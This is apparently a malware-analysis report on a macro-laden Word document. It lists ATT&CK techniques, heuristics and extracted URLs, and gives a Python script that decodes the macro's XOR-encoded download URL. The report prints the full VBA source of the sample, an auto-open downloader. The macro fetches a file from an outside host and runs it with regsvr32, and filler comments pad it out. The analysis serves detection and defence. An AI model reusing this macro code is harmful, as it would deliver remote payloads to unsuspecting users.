MALICIOUS
Risk Score: 150
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1218.010 Regsvr32 (the payload is launched as `regsvr32 TT.pdf` through WScript.Shell)
T1140 Deobfuscate/Decode Files or Information (the download URL is XOR-encoded in the constant `X`)
The sample is a malicious OOXML (Word) document carrying a VBA project. Its `autoopen` macro runs as soon as the document is opened with macros enabled. It rebuilds a URL from the string constant `X` (underscore-separated byte values, each XORed with 111 in `cA`/`NF`), calls `URLDownloadToFile` to save that resource as `TT.pdf` relative to Word's current working directory, and then executes it through `WScript.Shell` (`WshShell.Run`) with the command line `regsvr32 TT.pdf`, assembled from the constants `N` and `Zw`. The `.pdf` extension is a decoy: regsvr32 loads the file as a DLL regardless of its name and calls its `DllRegisterServer` export. Decoded, `X` is hxxp://zai5fp642[.]com/xemcl/iba.php?l=kfa2.cab. The dictionary-word comment lines and the empty `wX1` module contain no logic and serve only as filler. The ClamAV detection and the `URLDownloadToFile` declaration in the VBA project together confirm downloader functionality.
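The decoder and the command construction described above can be reproduced outside Office. The following Python script is an added example written for this page, not code from the sample or from the analyzer: it reads the `Public Const` strings out of an excerpt of the page's own macros.bas (embedded below), re-implements `NF`/`cA` as a split-and-XOR decoder, brute-forces the single-byte key when the `Xor 111` literal is not visible, looks up the file argument of the `.download` call, and resolves the `N & Zw & " " + b` concatenation passed to `.run(`. The regexes, the function names and the defanging format are this example's own choices and assume the module layout shown on the page.

```python
# Added analyst script for this page; not code from the sample or the analyzer.
# Re-implements the macro's NF()/cA() decoder and reads the constants straight
# out of the extracted macros.bas text.
import re
from typing import Optional

# Excerpt of the page's macros.bas, cut down to the lines that carry logic
# (the filler comment lines and the empty wX1 module are omitted).
VBA_SOURCE = r'''
Public Const b As String = "TT.pdf"
Function cA(rl)
    sG = NF(rl)
    For Fn = 0 To UBound(sG)
        CX = CX & Chr(sG(Fn) Xor 111)
    Next Fn
    cA = CX
End Function
Sub autoopen()
    n7 = cA(X)
    frm.download n7, b
    Dim GM As New WshShell
    Call GM.run(N & Zw & " " + b)
End Sub
Public Const N As String = "reg"
Public Const Zw As String = "svr32"
Public Const X As String = "7_27_27_31_85_64_64_21_14_6_90_9_31_89_91_93_65_12_0_2_64_23_10_2_12_3_64_6_13_14_65_31_7_31_80_3_82_4_9_14_93_65_12_14_13"
Function NF(Ec)
    NF = Split(Ec, "_")
End Function
'''

CONST_RE = re.compile(r'Public Const (\w+) As String = "([^"]*)"')
XOR_KEY_RE = re.compile(r'\bXor\s+(\d+)\b')                 # Chr(sG(Fn) Xor 111)
ENCODED_RE = re.compile(r'^\d+(?:_\d+)+$')                  # "7_27_27_31_..."
DOWNLOAD_RE = re.compile(r'\.download\s+\w+\s*,\s*(\w+)')   # frm.download <url>, <file>
RUN_RE = re.compile(r'\.run\((.+)\)', re.IGNORECASE)        # GM.run(<expr>)
TOKEN_RE = re.compile(r'"[^"]*"|[A-Za-z_]\w*')              # string literal or identifier


def string_constants(src: str) -> dict[str, str]:
    """Every `Public Const <name> As String = "..."` in the module."""
    return {m.group(1): m.group(2) for m in CONST_RE.finditer(src)}


def xor_key(src: str) -> Optional[int]:
    """The literal key in the `Chr(... Xor n)` decode loop, if one is visible."""
    m = XOR_KEY_RE.search(src)
    return int(m.group(1)) if m else None


def decode_xor_list(blob: str, key: int, sep: str = "_") -> str:
    """Python equivalent of cA(NF(blob)): split on sep, XOR each value with key."""
    return "".join(chr(int(tok) ^ key) for tok in blob.split(sep))


def recover_key(blob: str, sep: str = "_") -> Optional[int]:
    """Fallback when the key is not in the source: the one single-byte key that
    turns the blob into a URL is the key the macro used."""
    for key in range(256):
        cand = decode_xor_list(blob, key, sep)
        if cand.startswith(("http://", "https://", "ftp://")) and cand.isprintable():
            return key
    return None


def eval_concat(expr: str, consts: dict[str, str]) -> str:
    """Resolve a VBA concatenation such as `N & Zw & " " + b`: string literals are
    taken verbatim, bare names are looked up in the module constants."""
    out = []
    for tok in TOKEN_RE.findall(expr):
        out.append(tok[1:-1] if tok.startswith('"') else consts.get(tok, f"<{tok}>"))
    return "".join(out)


def defang(url: str) -> str:
    """hxxp://host[.]tld/path: neutralise the scheme and the host's dots only."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def triage(src: str) -> dict:
    """Decode every underscore-separated numeric constant, find the dropped file
    name and rebuild the command line handed to WshShell.Run."""
    consts = string_constants(src)
    key = xor_key(src)
    decoded = {}
    for name, val in consts.items():
        if not ENCODED_RE.match(val):
            continue
        k = key if key is not None else recover_key(val)
        if k is not None:
            key = k
            decoded[name] = decode_xor_list(val, k)
    dl = DOWNLOAD_RE.search(src)
    run = RUN_RE.search(src)
    return {
        "xor_key": key,
        "decoded": decoded,
        "dropped_file": consts.get(dl.group(1)) if dl else None,
        "command": eval_concat(run.group(1), consts) if run else None,
    }


if __name__ == "__main__":
    r = triage(VBA_SOURCE)
    for name, url in r["decoded"].items():
        print(f"{name} -> {defang(url)}   (XOR key {r['xor_key']})")
    print("drops :", r["dropped_file"])
    print("runs  :", r["command"])
```

Run it as-is to print the defanged URL, the dropped file name and the regsvr32 command line. To reuse it on another sample, replace `VBA_SOURCE` with the full olevba output, bearing in mind that the `.download`/`.run(` patterns follow this sample's wrapper names and that `eval_concat` only handles plain concatenation of constants and literals.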
Heuristics (5)

| Heuristic | Severity | ID | Detail |
|---|---|---|---|
| ClamAV: Doc.Downloader.GreenBox5-9139204-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0 |
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project (VBA macros present); 2 related findings |
| URLDownloadToFile in VBA | critical | OLE_VBA_DOWNLOAD | Matched line in script: `#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long #Else` |
| AutoOpen macro | low | OLE_VBA_AUTOOPEN | Matched line in script: `End Function Sub autoopen() n7 = cA(X)` |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. 28 URLs extracted, listed below. |

All 28 extracted URLs are XML namespace identifiers from the OOXML package markup (WordprocessingML, DrawingML, markup-compatibility). Every Word document carries them and they are never contacted over the network. The analyzer labels each one "Referenced by macro". The macro's real download URL is XOR-encoded in the constant `X` and does not appear in this list.

- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
- http://schemas.microsoft.com/office/drawing/2014/chartex
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.microsoft.com/office/drawing/2016/ink
- http://schemas.microsoft.com/office/drawing/2017/model3d
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2010/wordml
- http://schemas.microsoft.com/office/word/2012/wordml
- http://schemas.microsoft.com/office/word/2018/wordml/cex
- http://schemas.microsoft.com/office/word/2016/wordml/cid
- http://schemas.microsoft.com/office/word/2018/wordml
- http://schemas.microsoft.com/office/word/2015/wordml/symex
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk
- http://schemas.microsoft.com/office/word/2006/wordml
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4271 bytes | 3ba8b90692c2e39b9a487d8a45ea68d5a74044ea194c06b3cd1de81cb0abd5ed |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wX"
Public Const b As String = "TT.pdf"
Function cA(rl)
sG = NF(rl)
For Fn = 0 To UBound(sG)
CX = CX & Chr(sG(Fn) Xor 111)
Next Fn
cA = CX
End Function
Sub autoopen()
n7 = cA(X)
' Retirement provinces project quantitative spat
' Courtier responsibility wat
' Households vault louisville
' Female exp palaver invited
' Gonna previously identifier retention
' Libels eg discipline
frm.download n7, b
' Promises pierre bulge animation
' Oak either paucity
' Breasts
' Terrain libs
' Foretell
' Bits
' Authorization romantic exhaust frog frustrate geranium
' Combo metallica measurable smoothness
' Format situation keyhole legend
' Deprecate jun fete
' Basket resounding tropics
' Spat
' Ravenna inflammation omnipotence
' Duck incorrect nowt
' Computation celebration pen blockhead subjective
' Monetary financial
' Huge uncertainty mysticism fragrance
' Sherman briefing payment blithe draughts
Dim GM As New WshShell
' Unless desk accessible
' Herb adopt converge speed cd effie
' Climatic
Call GM.run(N & Zw & " " + b)
' Steaming explanation yuan
' Via lid belief overloaded
' Concurrence moscow
End Sub
Attribute VB_Name = "wX1"
Function T6(Py)
' Pj ribald agonised til foresail ingratiate nj
' Pliant lucy incompleteness journalism wizened manchester there
' Reset disclosure acdbentity
End Function
Sub uu(FO)
' Insignificance estates inconsistency motherless
' Northamptonshire proposal shirk
' Bus explorer pics maryland
' Macedonia minimum enb
' Postman sorts
' Tawny
' Enquiries whitsuntide storey
' Shadows
' Therefore
' Teaches shaw evans peoples
' Humped cigarettes laughingly
' Pgp
' Forefront purchase recapitulate spry engross
' Edge
' Provisional snorting semi
' Iso duo harvard pa
' Forked flash designer
' Drawback prevention midsummer
' Muscles waft
' Vishnu hove hops aye
' Cherry browsers alison
' Cattleman briar childrens underground mistrust
' Errant effectiveness
' Competition scribble deterioration h
' Ever prefecture dome instigation
' Silica southeast bread
' Bostonian smock slim numbers
' Colleague stimulate framework reserves hosiery
' Positions
' Terrify enviable walks optical
' Flickr gay retail harbour
' Vastness
' Hey brokers
' Outcast liberals calvinist republic magnanimity disband
' Forge circumcision allowance bowsprit
' Ada folks touchstone
' Ada intrusive sleight ontario bonnie bubbles
' Apples kate periodically culprit canned
' Cross accumulates palette rotund nigeria
' Placement incl
' Rfc aground bel fiftieth clients notebook abdomen
' Publicly dvd harvey tall rarely contrasting
' Parish ranging question
' Completes licking economically
' Suse frankenstein pdas paraphernalia
' Alpha diving acute glasgow
End Sub
Attribute VB_Name = "V7"
Public Const N As String = "reg"
Public Const Zw As String = "svr32"
Public Const X As String = "7_27_27_31_85_64_64_21_14_6_90_9_31_89_91_93_65_12_0_2_64_23_10_2_12_3_64_6_13_14_65_31_7_31_80_3_82_4_9_14_93_65_12_14_13"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal ZX As Long, ByVal nj As String, ByVal CD As String, ByVal yr As Long, ByVal av As Long) As Long
#End If
Function NF(Ec)
NF = Split(Ec, "_")
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{13D52D41-5F9F-48CF-8820-5BBF993DF0E7}{FB72B109-7D26-4BF0-B828-12902660A651}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes | 99154e39930e2fbffb0bc1440921212d5faa26614393158e7498293b9c53f60b |